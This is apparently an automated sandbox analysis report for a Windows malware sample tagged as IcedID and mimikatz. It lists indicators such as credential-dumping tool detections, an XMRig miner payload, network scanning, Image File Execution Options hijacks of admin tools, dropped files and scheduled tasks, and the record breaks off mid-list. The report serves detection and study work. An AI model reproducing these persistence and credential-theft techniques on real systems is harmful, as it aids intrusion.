Analysis
-
max time kernel
151s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
10-04-2024 00:52
Behavioral task
behavioral1
Sample
2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe
-
Size
13.7MB
-
MD5
74dae0e65f4adbbb80aa9b3df54fc6df
-
SHA1
ef164798ed552d0b5e3cbd5d4c2188c0d0b8e685
-
SHA256
b3afe8e32a494c46bdac407dbf8ac9078516217e10d770ec4a337c32a5f2c2eb
-
SHA512
4f1805c88f8e09b6c6738c6efbc88407e03dd9aefdbcae95e7a1d93f2761bd696800c21e0ecbb2d46be81042ac7cd67781187ef8014404a9f5f168287bf11464
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
naustif.exedescription pid process target process PID 4448 created 1652 4448 naustif.exe spoolsv.exe -
Contacts a large (25099) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1088-136-0x00007FF75CD80000-0x00007FF75CE6E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 40 IoCs
Processes:
resource yara_rule behavioral2/memory/4648-0-0x0000000000400000-0x0000000000AA4000-memory.dmp UPX C:\Windows\rkilesrw\naustif.exe UPX behavioral2/memory/2716-7-0x0000000000400000-0x0000000000AA4000-memory.dmp UPX C:\Windows\tteyulnen\Corporate\vfshost.exe UPX behavioral2/memory/1088-134-0x00007FF75CD80000-0x00007FF75CE6E000-memory.dmp UPX behavioral2/memory/1088-136-0x00007FF75CD80000-0x00007FF75CE6E000-memory.dmp UPX C:\Windows\Temp\tteyulnen\skyttnyln.exe UPX behavioral2/memory/3684-213-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/3684-216-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX C:\Windows\Temp\vzignttnc\ybtnut.exe UPX behavioral2/memory/2948-220-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp UPX behavioral2/memory/4536-242-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/4452-246-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/2948-248-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp UPX behavioral2/memory/3396-255-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/2948-257-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp UPX behavioral2/memory/2080-261-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/2948-264-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp UPX behavioral2/memory/1140-266-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/4396-270-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/2188-274-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/3276-278-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/2948-280-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp UPX behavioral2/memory/4020-283-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/2948-286-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp UPX behavioral2/memory/3084-288-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/2948-290-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp UPX behavioral2/memory/3088-293-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/2392-297-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/3484-312-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/2948-313-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp UPX behavioral2/memory/1704-315-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/2948-316-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp UPX behavioral2/memory/6612-318-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/5888-321-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/6944-323-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/5044-325-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp UPX behavioral2/memory/2948-326-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp UPX behavioral2/memory/2948-328-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp UPX behavioral2/memory/2948-329-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp UPX -
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/2948-248-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp xmrig behavioral2/memory/2948-257-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp xmrig behavioral2/memory/2948-264-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp xmrig behavioral2/memory/2948-280-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp xmrig behavioral2/memory/2948-286-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp xmrig behavioral2/memory/2948-290-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp xmrig behavioral2/memory/2948-313-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp xmrig behavioral2/memory/2948-316-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp xmrig behavioral2/memory/2948-326-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp xmrig behavioral2/memory/2948-328-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp xmrig behavioral2/memory/2948-329-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
resource yara_rule behavioral2/memory/4648-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz C:\Windows\rkilesrw\naustif.exe mimikatz behavioral2/memory/2716-7-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/1088-136-0x00007FF75CD80000-0x00007FF75CE6E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
naustif.exewpcap.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts naustif.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts naustif.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 2420 netsh.exe 3960 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
Processes:
naustif.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe naustif.exe -
Executes dropped EXE 30 IoCs
Processes:
naustif.exenaustif.exewpcap.exeeblttilyr.exevfshost.exeskyttnyln.exeybtnut.exexohudmc.exeskyttnyln.exejobnom.exeskyttnyln.exenaustif.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exekrslbantt.exeskyttnyln.exeskyttnyln.exenaustif.exeskyttnyln.exeskyttnyln.exeskyttnyln.exepid process 2716 naustif.exe 4448 naustif.exe 2720 wpcap.exe 1316 eblttilyr.exe 1088 vfshost.exe 3684 skyttnyln.exe 2948 ybtnut.exe 1188 xohudmc.exe 4536 skyttnyln.exe 2892 jobnom.exe 4452 skyttnyln.exe 1544 naustif.exe 3396 skyttnyln.exe 2080 skyttnyln.exe 1140 skyttnyln.exe 4396 skyttnyln.exe 2188 skyttnyln.exe 3276 skyttnyln.exe 4020 skyttnyln.exe 3084 skyttnyln.exe 3088 skyttnyln.exe 2392 skyttnyln.exe 3484 skyttnyln.exe 32 krslbantt.exe 1704 skyttnyln.exe 6612 skyttnyln.exe 3484 naustif.exe 5888 skyttnyln.exe 6944 skyttnyln.exe 5044 skyttnyln.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exeeblttilyr.exepid process 2720 wpcap.exe 2720 wpcap.exe 2720 wpcap.exe 2720 wpcap.exe 2720 wpcap.exe 2720 wpcap.exe 2720 wpcap.exe 2720 wpcap.exe 2720 wpcap.exe 1316 eblttilyr.exe 1316 eblttilyr.exe 1316 eblttilyr.exe -
Processes:
resource yara_rule C:\Windows\tteyulnen\Corporate\vfshost.exe upx behavioral2/memory/1088-134-0x00007FF75CD80000-0x00007FF75CE6E000-memory.dmp upx behavioral2/memory/1088-136-0x00007FF75CD80000-0x00007FF75CE6E000-memory.dmp upx C:\Windows\Temp\tteyulnen\skyttnyln.exe upx behavioral2/memory/3684-213-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/3684-216-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx C:\Windows\Temp\vzignttnc\ybtnut.exe upx behavioral2/memory/2948-220-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp upx behavioral2/memory/4536-242-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/4452-246-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/2948-248-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp upx behavioral2/memory/3396-255-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/2948-257-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp upx behavioral2/memory/2080-261-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/2948-264-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp upx behavioral2/memory/1140-266-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/4396-270-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/2188-274-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/3276-278-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/2948-280-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp upx behavioral2/memory/4020-283-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/2948-286-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp upx behavioral2/memory/3084-288-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/2948-290-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp upx behavioral2/memory/3088-293-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/2392-297-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/3484-312-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/2948-313-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp upx behavioral2/memory/1704-315-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/2948-316-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp upx behavioral2/memory/6612-318-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/5888-321-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/6944-323-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/5044-325-0x00007FF646FC0000-0x00007FF64701B000-memory.dmp upx behavioral2/memory/2948-326-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp upx behavioral2/memory/2948-328-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp upx behavioral2/memory/2948-329-0x00007FF7905B0000-0x00007FF7906D0000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 72 ifconfig.me 73 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
naustif.exewpcap.exexohudmc.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData naustif.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE naustif.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache naustif.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content naustif.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 naustif.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A naustif.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 naustif.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft naustif.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 naustif.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A naustif.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\jobnom.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\jobnom.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies naustif.exe -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
naustif.execmd.exekrslbantt.exe2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exedescription ioc process File opened for modification C:\Windows\tteyulnen\igasksjja\Packet.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\tibe-2.dll naustif.exe File created C:\Windows\rkilesrw\vimpcsvc.xml naustif.exe File created C:\Windows\tteyulnen\Corporate\vfshost.exe naustif.exe File opened for modification C:\Windows\tteyulnen\Corporate\log.txt cmd.exe File created C:\Windows\tteyulnen\Corporate\mimilib.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\svschost.exe naustif.exe File created C:\Windows\tteyulnen\UnattendGC\Shellcode.ini naustif.exe File opened for modification C:\Windows\tteyulnen\igasksjja\Result.txt krslbantt.exe File created C:\Windows\tteyulnen\UnattendGC\specials\docmicfg.exe naustif.exe File created C:\Windows\rkilesrw\svschost.xml naustif.exe File created C:\Windows\tteyulnen\igasksjja\wpcap.exe naustif.exe File created C:\Windows\tteyulnen\igasksjja\Packet.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\ssleay32.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\docmicfg.xml naustif.exe File opened for modification C:\Windows\rkilesrw\svschost.xml naustif.exe File created C:\Windows\tteyulnen\UnattendGC\AppCapture64.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\coli-0.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\exma-1.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\trch-1.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\vimpcsvc.exe naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\spoolsrv.xml naustif.exe File created C:\Windows\rkilesrw\schoedcl.xml naustif.exe File created C:\Windows\rkilesrw\naustif.exe 2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe File created C:\Windows\tteyulnen\UnattendGC\specials\ucl.dll naustif.exe File created C:\Windows\rkilesrw\spoolsrv.xml naustif.exe File opened for modification C:\Windows\rkilesrw\docmicfg.xml naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\crli-0.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\docmicfg.xml naustif.exe File created C:\Windows\tteyulnen\UnattendGC\AppCapture32.dll naustif.exe File created C:\Windows\tteyulnen\Corporate\mimidrv.sys naustif.exe File opened for modification C:\Windows\rkilesrw\naustif.exe 2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe File created C:\Windows\tteyulnen\igasksjja\wpcap.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\svschost.xml naustif.exe File created C:\Windows\rkilesrw\docmicfg.xml naustif.exe File opened for modification C:\Windows\rkilesrw\spoolsrv.xml naustif.exe File created C:\Windows\tteyulnen\igasksjja\eblttilyr.exe naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\libeay32.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\tucl-1.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\trfo-2.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\spoolsrv.exe naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\schoedcl.exe naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\svschost.xml naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\vimpcsvc.xml naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\schoedcl.xml naustif.exe File opened for modification C:\Windows\rkilesrw\vimpcsvc.xml naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\cnli-1.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\vimpcsvc.xml naustif.exe File created C:\Windows\tteyulnen\upbdrjv\swrpwe.exe naustif.exe File created C:\Windows\tteyulnen\igasksjja\ip.txt naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\posh-0.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\xdvl-0.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\zlib1.dll naustif.exe File created C:\Windows\ime\naustif.exe naustif.exe File created C:\Windows\tteyulnen\igasksjja\krslbantt.exe naustif.exe File created C:\Windows\tteyulnen\UnattendGC\specials\libxml2.dll naustif.exe File created C:\Windows\tteyulnen\UnattendGC\spoolsrv.xml naustif.exe File opened for modification C:\Windows\rkilesrw\schoedcl.xml naustif.exe File created C:\Windows\tteyulnen\igasksjja\scan.bat naustif.exe File created C:\Windows\tteyulnen\UnattendGC\schoedcl.xml naustif.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 4244 sc.exe 2120 sc.exe 4092 sc.exe 1472 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
Processes:
resource yara_rule C:\Windows\rkilesrw\naustif.exe nsis_installer_2 C:\Windows\tteyulnen\igasksjja\wpcap.exe nsis_installer_1 C:\Windows\tteyulnen\igasksjja\wpcap.exe nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 3468 schtasks.exe 4056 schtasks.exe 1304 schtasks.exe -
Modifies data under HKEY_USERS 47 IoCs
Processes:
skyttnyln.exeskyttnyln.exeskyttnyln.exenaustif.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ naustif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Set value (int) 